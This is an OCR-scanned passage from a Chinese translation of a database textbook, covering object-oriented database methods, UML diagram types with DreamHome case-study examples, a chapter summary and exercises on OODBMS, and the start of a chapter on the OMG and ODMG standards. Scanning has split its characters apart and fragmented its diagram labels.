某 一 对 象 对 其 他 对 象 来 说 变 得 不 可 访问 了 ， 则 自动 被 删除 。 前 面 我 们 将 这 称 为 垃圾 回收 。 
访问 方法 

访问 方法 返回 类 实例 的 某 一 属性 的 值 或 者 一 组 属性 的 值 。 访 问 方 法 返回 的 可 能 是 一 
个 单独 的 属性 值 、 多 个 属性 值 或 者 一 个 值 的 集合 。 例 如 ， 可 以 为 类 SalesSta 作 定义 方法 
getSalary， 以 返回 某 一 职员 的 工资 ， 或 者 为 类 Person 定义 方法 getContactDetails， 以 返回 某 
个 人 的 地 址 和 电话 号 码 。 访 问 方法 也 可 以 返回 与 类 相关 的 数据 。 例 如 ， 可 以 为 类 SalesStaff 
定义 方法 getAverageSalary， 以 计算 所 有 销售 人 员 的 平均 工资 。 访问 方法 还 可 以 从 某 个 属性 
导出 数据 。 例 如 ， 可 以 为 类 Person 定义 方法 getAge， 以 根据 某 人 的 生日 计算 其 年 龄 。 一 些 
系统 能 够 自动 生成 访问 每 一 个 属性 的 方法 。 这 种 方法 被 SQL:2011 标准 采纳 ， 它 为 每 种 新 数 
据 类 型 的 每 个 属性 都 提供 了 一 个 自动 的 observer (get) 方法 (参见 9.6 节 )。 
变换 方法 

变换 方法 改变 (变换 ) 类 实例 的 状态 。 例 如 ， 可 以 为 类 SalesSta 人 ff 定义 方法 incerementSalary， 
从 而 按照 规定 的 数额 增加 某 位 员工 的 工资 。 一 些 系统 能 够 自动 定义 更 新 每 一 个 属性 的 方法 。 
同样 地 ， 这 种 方法 也 被 SQL:2011 标准 采纳 ， 它 为 每 种 新 数据 类 型 的 每 个 属性 都 提供 了 一 个 
自动 的 mutator (put) 方法 (参见 9.6 节 )。 
识别 方法 

要 识别 出 方法 有 几 种 不 同 的 方法 学 ， 通 常会 组 合 使 用 下 列 办 法 : 

e 生 识 别 出 类 ， 然 后 确定 那些 对 每 个 类 可 能 都 要 提供 的 方法 。 

e 自 上 而 下 地 分 解 应 用 并 确定 那些 为 提供 所 需 功 能 必要 的 方法 。 

例如 ， 在 DreamHome 样 例 研 究 中 ， 我 们 首先 识别 出 了 每 个 分 公司 要 做 的 操作 。 这 些 操 
作 给 出 了 合适 的 信息 ， 能 用 于 有 效 且 高 效 地 管理 该 部 门 并 能 够 支持 提供 给 业主 和 客户 的 服务 
(参见 附录 A)。 这 是 一 种 自 上 向 下 的 方法 : 我 们 与 每 一 个 相关 的 用 户 会 谈 ， 从 而 确定 了 所 需 
的 业务 。 利 用 所 需 业 务 的 知识 和 EER 模型 ， 后 者 已 经 识别 出 了 所 需 的 类 ， 我 们 就 可 以 开始 
确定 究竟 需要 什么 样 的 方法 以 及 每 个 方法 应 该 属于 哪个 类 。 

至 于 对 识别 方法 的 更 加 完整 的 讨论 超出 了 本 书 的 范围 。 还 有 一 些 其 他 的 同样 适用 于 
面向 对 象 的 分 析 与 设计 的 方法 学 ， 感 兴趣 的 读者 请 参见 Rumbaugh 等 人 (1991 )，Coad 和 
Yourdon ( 1991 ), Graham (1993), Blaha 和 Premerlani ( 1997 )， 以 及 Jacobson 等 人 (1999 )。 


27.8 采用 UML 的 面向 对 象 分 析 与 设计 
在 本 书 中 ， 我 们 已 经 将 UML (Unified Modeling Language， 统 一 建 模 语 言 ) 用 于 ER 建 
模 和 概念 数据 库 设 计 。 正 如 在 第 12 章 一 开始 提 到 的 ，UML 体现 了 20 世纪 80 年 代 后 期 90 


常 27 音 OODBMS 一 一 概念 与 蛮 计 151 


年 代 初 期 出 现 的 几 种 面向 对 象 的 分 析 与 设计 方法 的 统一 与 发 展 ， 比 较 著 名 的 有 Grady Booch 
提出 的 Booch 方法 ，James Rumbaugh 等 提出 的 对 象 建 模 技术 ( Object Modeling Technique， 
OMT) 以 及 Ivar Jacobson 等 人 提出 的 面向 对 象 的 软件 工程 (Object-Oriented Software 
Engineering，OOSE)。UML 已 经 被 对 象 管理 小 组 (Object Management Group ，OMG ) 采纳 
为 标准 ， 并 且 已 经 被 软件 业 接 受 而 成 为 对 象 和 构件 建 模 的 主要 符号 标记 法 。 

UML 通常 被 定义 为 “说 明 、 构 建 、 可 视 化 以 及 文档 化 软件 系统 的 一 种 标准 语言 ”。 与 建 
筑 业 中 使 用 的 建筑 学 蓝图 类 似 ，UML 也 提供 了 一 种 通用 的 描述 软件 模型 的 语言 。UML 并 没 
有 规定 任何 方法 学 的 实现 细节 ， 相 反 地 ， 它 是 一 种 灵活 的 可 定制 的 语言 ， 能 够 适用 于 任何 一 
种 方法 ， 并 且 可 以 被 广泛 地 用 于 软件 生命 周期 的 各 个 阶段 和 软件 的 整个 开发 过 程 。 

设计 UML 的 主要 目标 是 : 

e 提供 给 用 户 一 种 可 用 的 、 富 于 表现 力 的 可 视 化 建 模 语言 ， 使 得 用 户 开发 的 模型 意图 
明确 ， 便 于 交流 。 
提供 一 种 可 扩展 的 可 特殊 化 的 机 制 ， 以 便 扩展 核心 概念 。 例 如 ，UML 支持 原型 
( stereotype )， 原 型 允许 通过 扩展 和 精 化 已 有 元 素 的 语义 来 定义 新 的 元 素 。 原 型 的 名 
字 被 置 于 “<<” 和 “>>” 的 中 间 。 
独立 于 编程 语言 和 开发 过 程 。 
为 理解 建 模 语 言 提 供 形式 化 的 基础 。 
促进 面向 对 象 工具 市 场 的 发 展 。 
支持 更 高 层次 的 概念 ， 例 如 协作 、 框 架 、 模 式 和 构件 。 
集成 最 优 的 实践 。 
本 节 将 简要 介绍 UML 的 某 些 成 分 。 


27.8.1 UML 图 


UML 定义 了 多 种 图 ， 主 要 的 图 可 以 分 为 下 面 两 类 : 
e。 结构 图 : 描述 组 件 之 间 的 静态 联系 。 包 括 : 

唱 类 图 

里 对 象 图 

到 构件 图 

部 署 图 
e 行为 图 : 描述 组 件 之 间 的 动态 联系 。 包 括 : 


早 在 本 书 的 ER 建 模 阶段 就 已 经 用 到 了 类 图 的 符号 。 本 节余 下 的 部 分 里 将 简要 地 讨论 剩 
余 的 图 ， 并 给 出 应 用 示例 。 
对 象 图 

对 象 图 将 类 的 实例 模型 化 ， 用 以 描述 在 某 一 特定 时 间 点 的 系统 。 就 像 对 象 是 类 的 实例 一 
样 ， 可 以 将 对 象 图 看 作 类 图 的 实例 。 在 第 12 章 我 们 将 这 种 类 型 的 图 看 作 一 种 语义 网 图 。 利 
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用 这 种 技术 ,我 们 可 以 用 “现实 世界 ”的 数据 对 类 图 (这 里 指 ER 图 ) 进行 验证 并 且 记 录 
测试 用 例 。 许 多 对 象 图 都 只 是 用 实体 和 联系 描述 的 (用 UML 的 术语 就 是 对 象 和 关联 )。 
图 27-18 给 出 了 联系 Staff Manages PropertyForRent 的 对 象 图 。 





图 27-18 给 出 了 联系 Staff Manages PropertyForRent 的 实例 的 对 象 图 


构件 图 

构件 图 描述 了 物理 的 软 构 件 〈 例 如 ， 源 代码 、 运 行 时 (二进制 ) 代码 、 可 执行 代码 ) 之 
间 的 组 织 结 构 和 相互 关联 。 例 如 ， 构 件 图 可 以 描述 源 文件 和 可 执行 文件 之 间 的 相互 关联 ， 这 
与 makefile 文件 的 信息 类 似 ，makefile 描述 了 源 代码 之 间 的 相互 关联 并 且 可 用 于 应 用 程序 的 
编译 和 和 链接。 构件 是 用 一 个 其 左边 上 重 释 着 两 个 小 矩形 的 矩形 表示 。 两 构件 关联 则 是 用 从 一 
个 构件 指向 另 一 个 (前 一 个 构件 所 依赖 的 ) 构件 的 虚线 箭头 表示 。 
部 署 图 

部 署 图 描述 了 运行 时 系统 的 配置 情况 ， 给 出 了 硬件 结 点 、 在 该 结 点 运行 的 构件 以 及 结 点 之 
间 的 连接 。 结 点 用 一 个 三 维 的 立方 体 表示 。 构 件 图 和 部 署 图 可 以 结合 在 一 起 ， 如 图 27-19 所 示 。 
用 例 图 

在 对 象 和 构件 建 模 时 ，UML 采用 并 拓展 了 (尽管 不 是 强制 的 甚至 不 是 必需 的 ) 用 例 驱 
动 的 方法 。 用 例 图 描述 了 系统 (用例 ) 提供 的 功能 、 与 系统 交互 的 用 户 ( 执 行者 ) 以 及 用 户 
和 系统 功能 之 间 的 关系 。 在 软件 开发 生命 周期 的 需求 收集 和 分 析 阶 段 ， 利 用 用 例 表示 系统 的 
高 层 需求 。 更 具体 地 说 ， 用 例 描述 系统 能 执行 的 一 组 动作 序列 ， 以 及 由 特定 执行 者 可 观察 到 
的 结果 值 (Jacobson 等 人 ，1999 ) 。 

一 个 单独 的 用 例 是 用 一 个 椭圆 表示 的 ， 执 行者 则 用 简 笔 人 物 画 表示 ， 执 行者 和 用 例 之 
间 的 关联 用 线条 表示 。 执 行者 的 角色 写 在 执行 者 图 标的 下 面 。 执 行者 不 仅 限于 人 。 如 果 系 统 
需要 与 男 外 一 个 应 用 程序 通讯 ， 并 包括 了 输入 或 者 输出 ， 则 可 以 认为 应 用 程序 也 是 一 个 执行 
者 。 用 例 通常 表示 为 一 个 动词 加 上 一 个 对 象 ， 例 如 察看 房产 、 出 租房 产 。 图 27-20a 给 出 了 
拥有 四 个 用 例 的 Client 的 用 例 图 ，Staff 的 用 例 图 则 如 图 27-20b 所 示 。 用 例 的 符号 很 简单 ， 
因此 很 适合 用 来 表示 通讯 。 
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维护 PropertyForRent ”查看 pionerty orient 





和 |O 


维护 Client 


b ) Staff 的 用 例 图 
图 27-20 
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顺序 图 
顺序 图 描述 了 随 着 时 间 的 推移 对 象 之 间 的 交互 情况 ， 顺 序 图 捕获 了 单个 用 例 的 行为 。 顺 
序 图 包括 了 用 例 中 的 对 象 以 及 这 些 对 象 之 间 的 消息 传递 。 在 顺序 图 中 ， 将 对 象 和 执行 者 作为 
列 ， 具 有 一 个 垂直 向 下 的 生命 线 ， 该 生命 线 代表 了 对 象 的 寿命 。 活 跃 / 聚焦 控制 是 用 一 个 生 
命 线 上 的 和 矩形 框 表示 的 ， 它 表明 了 对 象 执行 某 一 动作 的 执行 期 。 对 象 的 删除 则 是 在 其 生命 线 
上 某 个 适当 的 点 用 义 表示 。 图 27-21 给 出 了 在 设计 中 产生 的 找 房 ( search properties) 用 例 的 


顺序 图 示例 (早期 生成 的 顺序 图 时 ， 可 以 没有 传 给 消息 的 参数 )。 
checkAvailability(pfrNo) : 
returnPFRAvailability() 


returnAvailability() 


~ ! 
arrangeViewing!() | 0 pfrNo,; 
! viewDate ' 





:aClient 








SearchProperties() 


ma ee eee ype, 













returnResults() 


图 27-21 找 房 用 例 的 顺序 图 


协作 图 

协作 图 是 另外 一 种 类 型 的 交互 图 ， 协 作 图 将 对 象 之 间 的 交互 表示 为 一 系列 顺序 的 消息 。 
协作 图 描述 了 对 象 图 和 顺序 图 之 间 的 一 种 联系 。 顺 序 图 是 用 行列 类 型 的 形式 描述 交互 的 ， 与 
顺序 图 不 同 ， 协 作 图 则 用 一 种 更 加 自由 的 形式 安排 对 象 的 位 置 ， 因 此 也 就 更 容易 看 到 设计 某 
一 对 象 的 所 有 的 交互 。 消 息 被 标 以 一 个 按时 间 顺 序 分 配 的 编号 ， 以 维护 次 序 信息 。 图 27-22 
给 出 了 找 房 用 例 的 协作 图 示例 。 


1. SearchProperties() 
2. arrangeViewing!() 







1.1 matchPreferences(prefType, maxRent) 
人 
一 一 一 一 一 一 
:aClient 1.2 returnResults() 








OO 
1.1.2 returnPFRAvailability() 











2.1 arrangeView(aClientNo, pfrNo, 
viewDate) 


1.1.1 checkAvailability(pfrNo) | 1.1.1.1 returnAvailability() 


图 27-22” 找 房 用 例 的 协作 图 


Statechart 图 
Statechart 图 有 时 候 也 叫 状态 图 ， 用 以 描述 对 象 是 如 何在 对 外 部 事件 的 响应 中 变化 的 。 其 
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他 的 行为 图 通常 都 是 描述 多 个 对 象 之 间 的 交互 ， 而 状态 图 则 还 说 明了 对 象 的 转移 。 图 27-23 给 
出 了 PropertyForRent 的 状态 图 示例 。 同 样 地 ， 状 态 图 也 只 用 到 了 几 种 简单 的 符号 : 
。 状态 是 用 圆 角 和 矩形 表示 的 。 
e 转移 是 用 一 个 位 于 状态 之 间 的 标 有 “事件 名 称 / 动作 ”的 实 线 箭 头 表示 (事件 触发 了 
转移 ， 动 作 是 转移 的 结果 )。 例 如 ， 在 图 27-23 中 ， 从 状态 “未 定 ” 到 状态 “可 出 租 ” 
的 转移 由 事件 “同意 出 租房 屋 ” 触 发 ， 产生 了 动作 makeAvailable()。 
@ 初始 状态 (对 象 在 发 生 任何 转移 之 前 的 状态 ) 是 用 一 个 带 有 指向 初始 状态 箭头 的 实心 
圆 表示 的 。 
e 最 终 状 态 (标记 着 对 象 被 删除 的 状态 ) 是 用 一 个 有 边界 环 的 实心 圆 表示 ， 并 且 有 一 个 
箭头 从 前 一 个 状态 指向 该 实心 圆 。 


同意 (出租 ) 房 居 ，””“、 ” 移 除 房屋 / 


makeAvailable() makeUnavailable() 


















出 租房 屋 / 


makeUnavailable() 


租 期 已 完 / 
makeAvailable() 


makeUnavailable() 


拒绝 房屋 
图 27-23 ”PropertyForRent 的 状态 图 示例 


活动 图 

活动 图 描述 了 从 一 个 活动 到 另 一 个 活动 的 控制 流 。 活 动 图 通常 表示 了 某 个 操作 、 商 务 过 
程 的 一 个 步骤 或 者 整个 商务 过 程 的 执行 情况 。 活 动 图 包括 了 活动 状态 以 及 活动 状态 之 间 的 转 
移 。 带 有 控制 流 和 分 支 (用 小 菱形 表示 ) 的 活动 图 可 用 于 说 明 各 种 可 能 的 转移 路 线 。 并 行 执 
行 流 是 用 分 义 ( fork) 和 汇合 (join) 结构 (实心 矩形 ) 表示 。 泳 道 则 可 用 以 分 隔 开 相互 独立 
的 区 域 。 图 27-24 显示 了 DreamHome 的 初始 活动 图 。 


27.8.2 ”UML 在 数据 库 设计 方法 学 中 的 应 用 


前 面 讲述 的 多 种 类 型 的 图 在 数据 库 系 统 开 发 生命 周期 中 都 是 非常 有 用 的 ， 尤 其 是 在 需 
求 收 集 和 分 析 、 数 据 库 设计 以 及 应 用 程序 设计 阶段 。 下 面 给 出 一 些 有 用 的 指南 ( McCready, 
2003 ): 
e 根据 需求 规格 说 明 书 或 者 在 生成 需求 规格 说 明 书 期 间 生 成 用 例 图 ， 以 描述 系统 所 需 
的 主要 功能 。 可 以 为 用 例 增加 用 例 描 述 (每 一 个 用 例 的 文本 化 描述 )。 
。 生成 初步 的 类 图 (ER 模型 )。 
。 为 每 一 个 用 例 或 者 每 一 组 相关 的 用 例 生 成 一 个 顺序 图 。 这 样 就 可 以 显示 出 类 (实体 ) 
与 类 之 间 的 交互 ， 这 些 交 互 对 于 支持 每 一 个 用 例 中 定义 的 功能 来 说 是 必要 的 。 根 据 
顺序 图 就 能 够 很 容易 地 生成 协作 图 (例如 ，CASE 工具 Rational Rose 就 能 够 根据 相 
应 的 顺序 图 自动 地 生成 协作 图 )。 
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图 27-24 DreamHome 的 活动 图 示例 


在 类 图 中 引入 控制 类 有 助 于 描绘 执行 者 和 系统 之 间 的 边界 (控制 类 操作 源 自 于 用 例 )。 
e 更 新 类 图 以 显示 出 每 个 类 所 需 的 方法 。 

为 每 一 个 类 创建 一 个 状态 图 ， 以 说 明 类 在 响应 了 其 所 接收 的 消息 以 后 是 如 何 变化 的 。 
这 些 消息 则 是 在 顺序 图 中 确定 的 。 

。 依据 在 该 设计 过 程 中 所 获取 的 新 的 知识 ， 对 早期 的 图 进行 修改 〈( 例 如， 状态 图 的 创 
建 可 能 会 为 类 图 标识 出 新 的 方法 )。 


本 章 小 结 


OODBMS 是 OODB 的 管理 者 。OODB 是 用 OODM 定义 的 一 个 持久 的 、 可 共享 的 对 象 库 。OODM 
是 能 捕获 面向 对 象 程序 设计 所 支持 的 对 象 语义 的 数据 模型 。 至 今 还 没有 被 普遍 接受 的 OODM。 

函数 数据 模型 (FDM) 与 对 象 的 方法 拥有 某 些 共同 的 思想 ， 包 括 对 象 标 识 、 继 承 、 重 载 和 导航 式 访 
问 。 在 FDM 中 ， 任 何 数据 检索 任务 都 可 被 视 为 某 个 带 有 零 个 、 一 个 或 者 多 个 参数 的 函数 先 计算 后 
返回 结果 的 过 程 。 在 FDM 中 ， 主 要 的 建 模 原 语 是 实体 (entities) (不 是 实体 类 型 (entity types) 就 是 
可 打印 实体 类 型 (printable entity types) ) 和 函数 联系 (functional relationships ) 。 

持久 型 编程 语言 (persistent programming language) 是 一 种 允许 用 户 为 程序 的 后 续 执行 而 (透明 地 ) 
保存 数据 的 语言 。 持 久 型 编程 语言 中 的 数据 独立 于 任何 一 个 程序 ， 可 以 在 创建 它 的 代码 的 执行 期 和 
生命 周期 之 外 存在 。 但 是 ， 最 初 这 种 语言 既 没有 提供 完整 的 数据 库 功能 ， 也 没有 提供 用 多 种 语言 访 
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问 数据 的 功能 。 

开发 OODBMS 可 选 的 方法 包括 : 扩展 现 有 的 面向 对 象 的 编程 语言 ， 使 其 具有 数据 库 的 功能 ;提供 
可 扩展 的 OODBMS 库 ; 将 OODB 语言 结构 符 入 到 传统 的 宿主 语言 中 ; 扩展 现 有 的 数据 库 语言 ， 使 
其 具有 面向 对 象 的 功能 ; 开发 一 种 全 新 的 数据 库 数 据 模型 /数据 语言 。 

从 程序 员 的 角度 来 看 ， 最 关心 的 两 个 问题 可 能 就 是 性 能 和 易 用 性 ， 而 这 两 者 都 可 以 通过 较 之 传统 
DBMS 更 加 无 缝 地 集成 编程 语言 与 DBMS 来 实现 。 传 统 DBMS 具有 两 级 存储 模型 : 应 用 程序 在 内 
存 或 虚 存 中 的 存储 模型 和 数据 库 在 磁盘 上 的 存储 模型 。 相 反 地 ，OODBMS 则 支持 单 级 存储 模型 ， 
即 内 存 中 的 数据 与 存储 在 磁盘 中 的 数据 库 中 的 数据 具有 相似 的 表示 。 

有 两 种 类 型 的 对 象 标识 符 (OID ) : 独立 于 对 象 在 磁盘 中 的 物理 位 置 的 逻辑 OID 和 对 位 置 进行 编码 
的 物理 OID。 对 于 前 者 ， 需 要 一 次 间接 寻 址 来 找 出 存储 在 磁盘 上 的 对 象 的 物理 地 址 。 然 而 ， 无 论 哪 种 
情况 下 ，OID 的 大 小 与 标准 的 内 存 指针 是 不 同 的 ， 后 者 只 需要 大 到 足以 对 全 部 虚 存 单元 寻 址 就 够 了 。 
为 了 获得 所 需 性 能 ，OODBMS 必须 能 够 在 OID 和 内 存 指针 之 间 进 行 转 换 。 这 种 转换 技术 被 称 为 指 
针 切 换 (pointer swizzling) 或 者 对 象 失效 (object faulting)， 用 来 实现 这 种 技术 的 方法 多 种 多 样 ， 从 
基于 软件 的 驻 内 检查 方案 到 底层 硬件 使 用 的 页 失效 方案 。 

持久 性 的 实现 方案 包括 检查 点 、 串 化 、 显 式 页 调度 和 正 交 持 久 性 。 正 交 持 久 性 (orthogonal persistence) 
则 基于 三 个 基本 的 原理 : 持久 性 独立 、 与 数据 类 型 正 交 和 可 传递 持久 性 。 

OODBMS 的 优点 包括 : 增强 的 建 模 能 力 、 可 扩展 性 、 消 除了 阻抗 失 配 、 更 具 表 达 力 的 查询 语言 、 
支持 模式 演化 、 支 持 长 寿 事务 、 适 用 于 高 级 数据 库 应 用 和 较 高 的 性 能 。 缺 点 包括 缺乏 通用 的 数据 模 
型 、 缺 少 经验 、 缺 乏 标 准 、 竞 争 激 烈 、 查 询 优化 与 封装 矛盾 、 对 象 级 的 加 锁 会 影响 性 能 、 复 杂 性 、 
缺少 对 视图 和 安全 性 的 支持 等 。 

为 了 适应 越 来 越 复 杂 的 数据 库 应 用 ， 出 现 了 两 种 “新 的 ”数据 模型 : 面向 对 象 数据 模型 (Object- 
Oriented Data Model，OODM) 和 对 象 关系 数据 模型 ( Object-Relational Data Model，ORDM)。 然 
而 不 同 于 以 前 的 数据 模型 ， 这 些 模 型 的 实际 组 成 并 非 那么 明确 。 这 种 演化 导致 了 第 三 代 DBMS 的 
出 现 。 


思考 题 


27.1 
27.2 
27.3 
27.4 
27;5 
27.6 
27.:7 
27.8 
217.9 
27.10 
27.11 
27,12 
27.13 
27.14 


描述 三 代 DBMS。 

对 照 比 较 不 同 的 面向 对 象 数 据 模型 的 定义 。 

描述 函数 数据 模型 主要 的 建 模 组 件 。 

什么 是 持久 编程 语言 ， 它 与 OODBMS 有 什么 不 同 ? 
讨论 传统 DBMS 使 用 的 两 级 存储 模型 和 OODBMS 使 用 的 单 级 存储 模型 之 间 的 不 同 。 
单 级 存储 模型 对 数据 存 取 有 何 影响 ? 

描述 可 以 用 来 创建 持久 对 象 的 主要 策略 。 

什么 是 指针 切换 ? 描述 指针 切换 的 不 同方 法 。 

描述 有 助 于 应 用 程序 设计 的 事务 协议 的 类 型 。 

讨论 为 什么 版 本 管理 对 某 些 应 用 来 说 是 一 种 有 用 的 机 制 。 
讨论 为 什么 模式 控制 对 某 些 应 用 来 说 是 一 种 有 用 的 机 制 。 
描述 OODBMS 的 不 同体 系 结构 。 

列举 OODBMS 的 优点 和 缺点 。 

描述 联系 在 OODBMS 中 如 何 建 模 。 
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天 的 


习题 
27.16 
27.17 
27.18 
27.19 


27.20 
2%7.21 


27.22 
27.23 
27.24 
27.25 
27.26 
27.27 
27.28 
2129 


27.30 
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描述 UML 中 不 同 的 建 模 标记 法 。 


对 于 附录 A 的 DreamHome 样 例 研 究 ， 给 出 适合 类 Branch 、Staff 和 PropertyForRent 的 属性 和 
方法 。 

对 于 附录 A 的 DreamHome 样 例 研究 ， 给 出 用 例 图 和 一 组 相关 的 顺序 图 。 

对 于 附录 B.1 的 University Accommodation Office 样 例 研究 ， 给 出 用 例 图 和 一 组 相关 的 顺序 图 。 
对 于 附录 B.2 的 EasyDrive School of Motoring 样 例 研 究 ， 给 出 用 例 图 和 一 组 相关 的 顺序 图 。 

对 于 附录 B.3 的 Wellmeadows Hospital 样 例 研 究 ， 给 出 用 例 图 和 一 组 相关 的 顺序 图 。 

假定 DreamHome 的 常务 董事 要 求 你 调查 并 报告 OODBMS 对 于 该 公司 的 适用 性 。 报 告 应 该 对 
关系 DBMS 和 OODBMS 的 技术 进行 比较 ， 并且 应 该 指出 在 公司 应 用 OODBMS 的 优点 和 缺 
点 ， 以 及 任何 可 预见 的 问题 。 最 后 ， 报 告 还 应 该 包含 一 组 完整 且 合 理 的 关于 OODBMS 对 于 
DreamHome 是 否 适用 的 结论 。 

对 于 第 4 章 习题 中 给 出 的 Hotel 关系 模式 ， 给 出 适用 于 这 个 系统 的 各 方法 的 建议 。 创 建 该 系统 
的 一 个 面向 对 象 模式 。 

对 于 第 5 章 习 题 中 给 出 的 Project 关系 模式 ， 给 出 适用 于 这 个 系统 的 各 方法 的 建议 。 创 建 该 系 
统 的 一 个 面向 对 象 模式 。 

对 于 第 5 章 习 题 中 给 出 的 Library 关系 模式 ， 给 出 适用 于 这 个 系统 的 各 方法 的 建议 。 创 建 该 系 
统 的 一 个 面向 对 象 模式 。 

给 出 附录 A 的 DreamHome 样 例 研究 的 一 个 面向 对 象 数据 库 设 计 。 说 明 支 持 该 设计 的 一 些 必 要 
的 假设 。 

给 出 附录 B.1 的 University Accommodation Office 样 例 研 究 的 一 个 面向 对 象 数据 库 设计 。 说 明 
支持 该 设计 的 一 些 必要 的 假设 。 

给 出 附录 B.2 的 EasyDrive School of Motoring 样 例 研究 的 一 个 面向 对 象 数据 库 设 计 。 说 明 支 持 
该 设计 的 一 些 必 要 的 假设 。 

给 出 附录 B.3 的 Wellmeadows Hospital 样 例 研 究 的 一 个 面向 对 象 数据 库 设 计 。 说 明 支 持 该 设计 
的 一 些 必 要 的 假设 。 

重 做 习题 27.22 到 习题 27.28， 给 出 采用 函数 数据 模型 的 模式 。 并 用 图 形 化 的 方式 说 明 每 一 
模式 。 

使 用 27.4.3 节 给 出 的 模式 一 致 性 的 规则 以 及 图 27-11 给 出 的 样 例 模 式 ， 考 虑 下 列 每 个 修改 操 
作 ， 陈 述 修改 可 能 对 模式 造成 的 影响 : 

(a) 向 类 中 添加 一 个 属性 

(b) 从 类 中 删除 一 个 属性 

(c) 重 命 名 一 个 属性 

(d) 使 类 S 成 为 类 C 的 超 类 

(e) 从 类 C 的 超 类 列表 中 删除 类 S 

(f) 创建 一 个 新 类 C 

(g) 删除 一 个 类 

(h) 修改 类 的 名 字 
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| 本章 目标 
本 章 我 们 主要 学 习 : 
e 对 象 管理 组 ( Object Management Group，OMG) 和 对 象 管理 架构 ( Object Management 
Architecture, OMA) 
公共 对 象 请 求 代理 架构 ( Common Object Request Broker Architecture，CORBA) 的 
主要 特性 
其 他 OMG 标准 的 主要 特性 ， 包 括 UML、MOF、XMI、CWM 和 模型 驱动 的 架构 
(Model-Driven Architecture, MDA) 
新 对 象 数据 管理 组 (Object Data Management Group,ODMG) 的 对 象 数据 标准 的 主要 特性 : 
四 对 象 模型 (OM ) 
昌 对 象 定义 语言 (ODL) 
加 对 象 查询 语言 (OQL) 
加 对 象 交换 格式 (OIF) 
可 语言 绑 定 
商品 化 OODBMS 一 一 ObjectStore 的 主要 特征 : 
加 ObjectStore 架构 
时 ObjectStore 中 的 数据 定义 
加 ObjectStore 中 的 数据 操作 


在 前 一 章 中 ， 我 们 分 析 了 与 面向 对 象 数 据 库 管理 系统 (OODBMS) 有 关 的 一 些 问题 。 本 
章 将 继续 研究 这 类 系统 ， 并 且 讨 论 由 对 象 数 据 管 理 组 (ODMG) 提出 的 对 象 模型 和 规范 语 
言 。ODMG 对 象 模型 具有 重要 的 意义 ， 因 为 它 制定 了 数据 库 对 象 语义 的 标准 模型 ， 并 支持 
兼容 系统 间 的 互 操作 。 它 已 经 成 为 OODBMS 事实 上 的 标准 。 为 了 将 OODBMS 的 讨论 置 于 
商业 背景 下 ， 本 章 还 将 分 析 ObjectStore ， 一 个 商品 化 OODBMS 的 架构 和 功能 。 
| 本 章 结构 

由 于 ODMG 模型 是 对 象 管理 组 (OMG) 支持 模型 的 一 个 超 集 ，28.1 节 首 先 对 OMG 和 
ODMG 架构 进行 概述 。28.2 节 讨 论 ODMG 的 对 象 模型 和 ODMG 的 规范 语言 。 最 后 ，28.3 
节 将 举例 说 明 商 品 化 OODBMS 的 架构 和 功能 ， 即 详细 讨论 ObjectStore。 

为 了 更 好 地 理解 本 章 的 知识 ,读者 应 该 熟悉 第 27 章 的 内 容 。 本 章 示 例 同样 来 自 11.4 节 
和 附录 A 中 的 DreamHome 样 例 研究 。 


28.1 ”对象 管理 组 
为 了 透彻 分 析 ODMG 对 象 模型 ， 首 先 简单 介绍 一 下 对 象 管理 组 的 职能 、 架 构 以 及 它 所 
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提出 的 一 些 语言 规范 。 


28.1.1 背景 


对 象 管理 组 (OMG) 创建 于 1989 年 ， 是 一 个 旨 在 解决 对 象 标准 问题 的 国际 非 僵 利 性 工 
业 协 会 。 该 协会 拥有 400 多 个 成 员 ， 事 实 上 几乎 包含 了 所 有 的 平台 供应 商 和 主要 的 软件 供应 
商 ， 例 如 Sun Microsystems、Borland、AT&TNCR 、HP、Hitachi、Computer Associates、 
Unisys 和 Oracle。 所 有 这 些 公司 已 经 达成 协议 共同 合作 ， 创 建 一 组 可 被 广泛 接受 的 标准 。 
OMG 的 主要 目的 是 在 软件 工程 中 推广 面向 对 象 的 方法 ， 以 及 进行 标准 的 开发 ， 使 得 对 象 的 
位 置 、 环 境 、 语 言 和 其 他 特性 对 其 他 对 象 来 说 完全 透明 。 

不 同 于 国际 标准 化 组 织 (ISO ) 或 者 像 美国 国家 标准 化 组 织 ( ANSI) 这 样 的 一 些 国家 团 
体 ， 也 不 同 于 电气 和 电子 工程 师 协 会 (IEEE)，OMG 并 不 是 一 个 公认 的 标准 化 组 织 。OMG 
的 目标 就 是 致力 于 事实 标准 的 开发 ， 这 些 事实 标准 终 将 会 被 ISO/ANSI 接受 的 。OMG 并 不 
实际 开发 或 者 发 布 产品 ， 但 会 对 产品 进行 认证 ， 认 证 其 是 否 与 OMG 标准 兼容 。 

1990 年 ，OMG 首次 发 布 了 它 的 对 象 管理 架构 (Object Management Architecture, OMA) 
指南 文件 ， 此 后 ， 又 更 新 了 多 个 版 本 (Soley，1990，1992，1995 )。 该 指南 为 面向 对 象 的 语 
言 、 系 统 、 数 据 库 和 应 用 程序 架构 制定 了 统一 的 术语 ; 给 出 了 面向 对 象 系统 的 抽象 架构 ; 制 
定 了 一 组 技术 和 结构 目标 ; 并 给 出 了 一 个 采用 面向 对 象 技术 的 分 布 式 应 用 的 参考 模型 。 参 考 
模型 确定 了 四 个 方面 的 标准 : 对 象 模型 (OM)、 对 象 请 求 代 理 (ORB)、 对 象 服务 和 公共 设施 ， 
如 图 28-1 所 示 。 


存储 ”事务 管理 。 查询 版 本 化 ”安全 保密 





图 28-1 对 象 引 用 模型 
对 象 模型 
对 象 模型 (Object Model，OM) 是 一 种 设计 简洁 的 抽象 模型 ， 它 能 跟 所 有 与 OMG 兼容 
的 面向 对 象 系统 通信 (参见 图 28-2 )。 查 询 者 向 ORB 发 送 对 象 服务 请 求 。ORB 对 系统 中 都 
有 哪些 对 象 以 及 这 些 对 象 能 够 提供 哪些 服务 类 型 了 如 指 掌 。 接 下 来 ，ORB 将 对 象 服务 请 求 
消息 传递 给 能 够 对 其 做 出 响应 的 提供 者 ， 然 后 再 通过 对 象 请 求 代理 将 响应 结果 返回 给 请 求 
者 。 稍 后 可 以 看 到 ，OMG OM 是 ODMG OM 的 一 个 子 集 。 
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图 28-2 OMG 对 象 模型 


ORB 以 一 种 高 度 可 互 操作 的 方式 处 理应 用 对 象 之 间 的 消息 发 布 。 效 果 上 ，ORB 可 视 为 一 个 
分 布 式 的 “软件 总 线 ”( 或 者 电话 交换 机 )， 它 使 得 对 象 (请 求 者 ) 能 够 提出 请 求 和 接收 来 自 提供 
者 的 响应 。 收 到 提供 者 的 响应 以 后 ，ORB 负责 将 该 响应 转变 为 一 种 原 请 求 者 能 够 理解 的 格 
